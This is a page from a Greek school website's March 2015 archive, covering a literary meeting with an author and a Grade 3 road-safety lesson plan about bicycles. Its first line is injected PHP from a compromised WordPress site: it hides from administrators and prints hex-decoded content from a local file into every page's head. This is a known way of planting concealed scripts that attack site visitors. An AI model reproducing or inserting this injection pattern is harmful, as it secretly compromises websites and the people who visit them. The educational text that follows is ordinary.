if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μάρτιος, 2015 |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Monthly Archives: Μάρτιος 2015

ΛΟΓΟΤΕΧΝΙΚΗ ΣΥΝΑΝΤΗΣΗ ΜΕ ΤΗΝ ΣΥΓΓΡΑΦΕΑ ΚΑΤΕΡΙΝΑ ΣΕΡΒΗ

Πραγματοποιήθηκε Λογοτεχνική Συνάντηση με καλεσμένη τη συγγραφέα ? αρχαιολόγο Κατερίνα Σέρβη την Πέμπτη, 05/03/2015 και ώρα 6.00 το απόγευμα στο χώρο του Σχολείου. Μέσα σε μια ζεστή και φιλική ατμόσφαιρα οι Γονείς και οι Κηδεμόνες των μαθητών του σχολείου μας συζήτησαν και αντάλλαξαν ενδιαφέρουσες απόψεις με την Συγγραφέα.

Κυκλοφοριακή αγωγή

ΠΗΛΙΟΥΡΑ ΒΑΣΙΛΙΚΗ ΠΕ70

ΑΥΓΕΡΗΣ ΒΑΣΙΛΗΣ ΠΕ70

ΒΑΒΙΤΣΑ ΠΑΤΡΟΥΛΑ ΠΕ20

ΔΙΔΑΚΤΙΚΟ ΣΕΝΑΡΙΟ

ΚΥΚΛΟΦΟΡΙΑΚΗ ΑΓΩΓΗ

Τίτλος: Το ποδήλατο στην καθημερινή μας ζωή.

Τάξη: Γ     Σχ. Έτος 2014-15

Οι μαθητές σκεφτόμενους τρόπους με τους οποίους μπορεί να περιοριστεί η κατανάλωση καυσίμων, κατέληξαν στο συμπέρασμα: χρησιμοποιούμε, όποτε είναι δυνατό το ποδήλατο για τις μετακινήσεις μας αντί για το αυτοκίνητο.

*  Γνωστικοί

-Να γνωρίζουν οι μαθητές τι σημαίνει << Κυκλοφοριακή Αγωγή >>

-Να αντιληφθούν με σαφήνεια πως λειτουργούν τα σήματα και τι

σημαίνει το καθένα.

-Να μάθουν πως πρέπει να διασχίζουν το δρόμο και πως να

περπατούν στο πεζοδρόμιο.

-Να αναφέρουν πως να οδηγούν το ποδήλατό τους, για τη χρήση του

κράνους, τις επιγονατίδες και τις επιαγκωνίδες.

-Να γνωρίζουν τι χρειάζεται να ελέγξουν πριν οδηγήσουν το

ποδήλατο  και ο τρόπος συντήρησής του.

 * Ψυχοκινητικοί

Ενεργοποίηση όλων των αισθήσεων των μαθητών με δημιουργικές

εργασίες ?θεατρικό παιχνίδι

  *Συναισθηματικοί

-Να ευαισθητοποιηθούν τα παιδιά σε διάφορα θέματα Κυκλοφοριακής Αγωγής.

-Να αποκτήσουν κυκλοφοριακή συνείδηση από τη μεριά του πεζού και του ποδηλάτη.

 *Κοινωνικοί

Εργασίες σε ομάδες.

Ανάπτυξη πρωτοβουλιών και ελεύθερης έκφρασης ιδεών από τους μαθητές.

 *Προβληματισμός

Οι μαθητές διαβάζουν στην τάξη και ακούν σε CD το εκπαιδευτικό παραμύθι για την ασφάλεια << Ο φίλος μου ο Ποδηλατάκιας >>που έχει κυκλοφορήσει το Υπουργείο Μεταφορών και Δικτύων.

 *Δραστηριότητες

-Οι μαθητές συγκεντρώνουν είτε από φυλλάδια είτε από το διαδίκτυο είτε από προσωπικές εμπειρίες τους κανόνες για τη σωστή οδική συμπεριφορά.

-Γνωρίζουν, ζωγραφίζουν και κατασκευάζουν τα σήματα του Κ.Ο.Κ.

-Παρατηρούν τις πινακίδες του Κώδικα Οδικής Κυκλοφορίας στους γύρω δρόμους του σχολείου.

-Δημιουργούν αυτοσχέδιο πάρκο κυκλοφοριακής αγωγής στον κήπο του σχολείου.

-Οι μαθητές περιγράφουν και σχεδιάζουν το δικό τους ποδήλατο.

-Δημιουργούν τη δική τους ακροστιχίδα με τη λέξη ποδήλατο και βρίσκουν λέξεις που να ανήκουν στην ίδια οικογένεια.

-Επισκέπτονται το κατάστημα πώλησης ποδηλάτων και διατυπώνουν ερωτήσεις για τα είδη αλλά και το κόστος των ποδηλάτων .Επίσης γνωρίζουν βασικά εξαρτήματα για τη ασφαλή οδήγηση πριν ανέβουν στο ποδήλατό τους και τρόπους για τη συντήρησή του.

-Περιγράφουν και ζωγραφίζουν ένα χάρτη που να εξηγούν τη ασφαλέστερη διαδρομή με το ποδήλατό τους από το σπίτι στο σχολείο.

-Δραματοποιούν σε θεατρικό παιχνίδι: <<Το ποδήλατο >> του Βαγγέλη Ηλιόπουλου.

-Ακούν και τραγουδούν το τραγούδι << Η ποδηλάτισσα >>

ΑΞΙΟΛΟΓΗΣΗ

 Διαπιστώθηκε ότι όλοι οι μαθητές έχουν το δικό τους ποδήλατο και ορισμένοι  το χρησιμοποιούν, όταν οι καιρικές συνθήκες το επιτρέπουν για να έρθουν στο σχολείο. Μέσα από τις δραστηριότητες συνειδητοποίησαν πως η τήρηση των κανόνων του Κώδικα Οδικής Κυκλοφορίας βοηθά στην αποφυγή ατυχημάτων.

Επίσης αποτελεί κοινή διαπίστωση ότι το ποδήλατο χρειάζεται να ενταχθεί στις δραστηριότητες της καθημερινής μας ζωής ,γιατί ο ποδηλάτης συνήθως είναι σε πολύ καλή φυσική κατάσταση και ένα ποδήλατο δεν είναι τόσο ακριβό και το κόστος συντήρησής του είναι ελάχιστο.